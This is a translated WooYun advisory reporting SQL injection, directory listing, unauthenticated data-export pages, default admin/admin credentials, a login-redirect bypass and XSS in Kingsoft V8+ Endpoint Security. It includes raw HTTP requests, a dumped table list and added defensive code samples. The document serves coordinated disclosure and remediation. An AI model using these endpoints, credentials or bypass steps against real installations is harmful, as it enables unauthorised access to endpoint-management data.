
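Vulnerability summary

Bug ID: wooyun-2016-0179804

Title: Kingsoft V8+ Endpoint Security System: 10 SQL injections (login required), insecure default configuration, admin back-end authorization bypass and other vulnerabilities

Vendor: Kingsoft Network (金山网络)

Author: niliu

Submitted: 2016-03-01 18:54

Fixed: 2016-05-30 20:10

Publicly disclosed: 2016-05-30 20:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]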



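Vulnerability details

Disclosure status:

2016-03-01: Details reported to the vendor; awaiting vendor handling
2016-03-01: Vendor confirmed; details disclosed to the vendor only
2016-03-04: Details opened to third-party security partners (NSFOCUS, 唐朝安全巡航, 无声信息)
2016-04-25: Details disclosed to core white hats and experts in related fields
2016-05-05: Details disclosed to regular white hats
2016-05-15: Details disclosed to trainee white hats
2016-05-30: Details disclosed to the public

Brief description:

Kingsoft V8+ Endpoint Security System: 10 SQL injections, insecure default configuration, and admin back-end authorization bypass

Detailed description:

First, a look at the product introduction:

[Screenshot: 1.jpg]


There are quite a few SQL injections; the 10 locations are as follows: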

1.
POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

2.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 408
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

3.
POST /report/report/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 205
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}}

4.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 409
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

5.
POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

6.
POST /boundary_manage/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 372
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7D
Referer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}}

7.
POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

8.
POST /settings/system/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

9.
POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

10.
POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 288
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}}
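
A defensive sketch for JSON command bodies like the ones above, added here as an example (it is not Kingsoft's code and not part of the original report): values are bound as SQLite parameters, and fields that cannot be bound, such as `sort_type` and `sort_order` from request 10, go through an allowlist. The table `soft_classify`, its columns and the function names are hypothetical; the report does not say which field is injectable.

```python
import json
import sqlite3

# Hypothetical schema: the report does not show the tables behind this query.
SORTABLE = {"state": "state", "name": "name"}   # allowlist: request value -> column
ORDERS = {"asc": "ASC", "desc": "DESC"}


def parse_page(value, lo=1, hi=100):
    """Accept only a decimal integer string within [lo, hi]."""
    if not (isinstance(value, str) and value.isdecimal()):
        raise ValueError("not a number")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError("out of range")
    return n


def list_classify(db, raw_body):
    cmd = json.loads(raw_body)["get_classify_list_info_cmd"]
    # Identifiers and keywords cannot be bound, so map them through allowlists.
    column = SORTABLE[cmd["sort_type"]]          # KeyError on anything unexpected
    order = ORDERS[cmd["sort_order"].lower()]
    limit = parse_page(cmd["count_page"])
    page = parse_page(cmd["current_page"], hi=10_000)
    # LIKE wildcards in the user's text are escaped; the text itself is bound.
    kw = cmd["key_words"].replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = (
        "SELECT name, state FROM soft_classify "
        "WHERE name LIKE ? ESCAPE '\\' "
        f"ORDER BY {column} {order} LIMIT ? OFFSET ?"
    )
    return db.execute(sql, (f"%{kw}%", limit, (page - 1) * limit)).fetchall()


def demo_db():
    """Constructed sample data, for illustration only."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE soft_classify (name TEXT, state INTEGER)")
    db.executemany("INSERT INTO soft_classify VALUES (?, ?)",
                   [("tool3", 1), ("game", 0), ("p2p3", 2)])
    return db
```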

Proof of vulnerability:

[Screenshots: 555.jpg, 777.jpg, 666.jpg, 787.jpg, 665.jpg, 445.jpg, 234.jpg, 545.jpg, 887.jpg, 999.jpg, 100.jpg]


Database: SQLite_masterdb
[69 tables]
+-----------------------------+
| ArpClientMacIp |
| ArpInfo |
| ArpInfo_History |
| ArpOptions |
| BDLogManagerOptions |
| BoundaryOptions |
| ClientDelete |
| ClientInfoCollect |
| ClientScanFinishInfo |
| ClientStaInfo |
| ClientUpdateOptions |
| ClientVersionInfo |
| ClientVirusCollect |
| DefaultPopedom |
| DomainGroupInfo |
| GroupInfo |
| HostInfo |
| HostSoftLeakScanInfo |
| HostSysLeakScanInfo |
| IPFilter |
| KChildSysCenterIPInfo |
| KClearOpenOptions |
| KFilePushInfo |
| KForbidSoftInfo |
| KGroupIP |
| KLncncCompanyInfo |
| KReport |
| KSimpleSoftInfo |
| KSoftUninstallStrategy |
| KSoftWareMgrOptions |
| KUninstallSoftInfo |
| KVDeviceGroupIP |
| KVDeviceGroupInfo |
| KVDipatcherPlanTask |
| KVMEngineOptions |
| LeakRepairStategy |
| LeakScanRepairCmd |
| MailMonOptions |
| MailMonVirusInfo |
| NetWorkManagerInfo |
| ReportIndex |
| ReportOnlineIPSet |
| ReportStrategy |
| RootWhiteListInfo |
| SCMessageLog |
| SCOperLog |
| SCOperation |
| SCUser |
| ScanConfigOptions |
| ScanOptions |
| StrongManagerOptions |
| SysMonitorOpt |
| SystemCenterTree |
| TaskOptions |
| UDiskAgentOptions |
| UDiskOptions |
| USBOptions |
| UninstallKavClientIPs |
| UserPopedom |
| VHierarchyBaseVirusDealInfo |
| VHierarchyInfo |
| VHierarchySetupInfo |
| VirusCountInfo |
| VirusInfo |
| ViuusInfoCollect |
| WatchOptions |
| _GroupInfo_old_20131010 |
| sqlite_sequence |
| webconfig |
+-----------------------------+


Insecure default configuration: the system enables directory browsing (directory listing) by default.
A few examples:

http://**.**.**.**/boundary_manage/
**.**.**.**:6868/active_defense/
**.**.**.**:6868/report/
http://**.**.**.**/active_defense/
**.**.**.**:6868/settings/


There are many more that I won't list; here are a few cases as proof:

[Screenshots: 1.jpg, 2.jpg, 3.jpg, 4.jpg, 5.jpg, 6.jpg]


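I then found that many pages can be accessed without authorization. There are too many pages to try them all one by one, so the vendor should restrict access across the board. Pages with "excel" in the file name directly download the corresponding data.
A few examples: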

**.**.**.**:6868/active_defense/scan/task.php
**.**.**.**:6868/active_defense/scan/export.php
**.**.**.**:6868/report/log/excel2.php
**.**.**.**:6868/report/log/analyse.php
**.**.**.**:6868/report/log/date_select.php
**.**.**.**:6868/report/log/excel.php
**.**.**.**:6868/report/general/ksafecount.php
http://**.**.**.**/active_defense/scan/task.php
http://**.**.**.**/boundary_manage/boundary_file_report.php
http://**.**.**.**/active_defense/scan/task.php


[Screenshots: 7.jpg, 8.jpg, 9.jpg, 10.jpg]


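Incidentally, the admin back end has the default credentials admin/admin.

[Screenshots: 111.jpg, 222.jpg]


The data visible through the unauthorized access above was fairly limited, so I tested some more and found that the back-end login can be bypassed completely...
Every page of the system checks on access whether the user is logged in, with the following request: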

GET /login.php HTTP/1.1
Host: **.**.**.**:6868
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8


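This request redirects to the login page, so simply intercepting this URL in Fiddler bypasses the check.

[Screenshot: z11.jpg]


After that it is possible to view the system configuration and passwords, modify the announcement (the announcement field is also vulnerable to XSS), and upload popular tools.
Here is the result:

[Screenshots: z1.jpg, z2.jpg, z3.jpg, z4.jpg, z5.jpg, z6.jpg, z7.jpg, z8.jpg, z9.jpg, z10.jpg]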


Suggested fix:

Input filtering + access control
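
The access-control half of that fix, as an added example (a Python WSGI model, not the product's PHP code and not from the original report): the login decision is made on the server for every request, so a client that drops the redirect to `/login.php` still receives no page content. The handler `pages`, the in-memory `SESSIONS` store and the helper names are hypothetical.

```python
import secrets
from http.cookies import SimpleCookie

PUBLIC_PATHS = {"/login.php"}   # deny by default: everything else needs a session
SESSIONS = {}                   # session id -> user name, kept on the server


def new_session(user):
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = user
    return sid


def session_user(environ):
    """Return the user bound to the request's session cookie, or None."""
    morsel = SimpleCookie(environ.get("HTTP_COOKIE", "")).get("PHPSESSID")
    return SESSIONS.get(morsel.value) if morsel is not None else None


def require_login(app):
    """WSGI middleware: a rejected request never reaches the page handler."""
    def gate(environ, start_response):
        path = environ.get("PATH_INFO", "/")
        if path not in PUBLIC_PATHS and session_user(environ) is None:
            start_response("302 Found", [("Location", "/login.php"),
                                         ("Cache-Control", "no-store")])
            return [b""]        # no page content accompanies the redirect
        return app(environ, start_response)
    return gate


def pages(environ, start_response):
    # Stand-in for the console's pages (hypothetical handler).
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"report data for " + environ["PATH_INFO"].encode()]


def fetch(app, path, cookie=""):
    """Call the WSGI app directly and return (status, body)."""
    seen = {}
    body = app({"PATH_INFO": path, "HTTP_COOKIE": cookie},
               lambda status, headers: seen.update(status=status))
    return seen["status"], b"".join(body)
```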

Copyright notice: when reposting, please credit the source niliu@乌云 (WooYun)


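Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2016-03-01 20:06

Vendor reply:

Thank you for your attention to Kingsoft security. This has been passed to the business team for follow-up and fixing. Thanks for the submission.

Latest status:

None yet


Vulnerability comments:

  1. 2016-03-01 21:05 | HackBraid, verified white hat (core white hat | Rank: 1892, vulnerabilities: 302 | Someone has recently been impersonating this account to commit fraud; anyone claiming to be HackBrai...)

    Front row, paying respects to master niliu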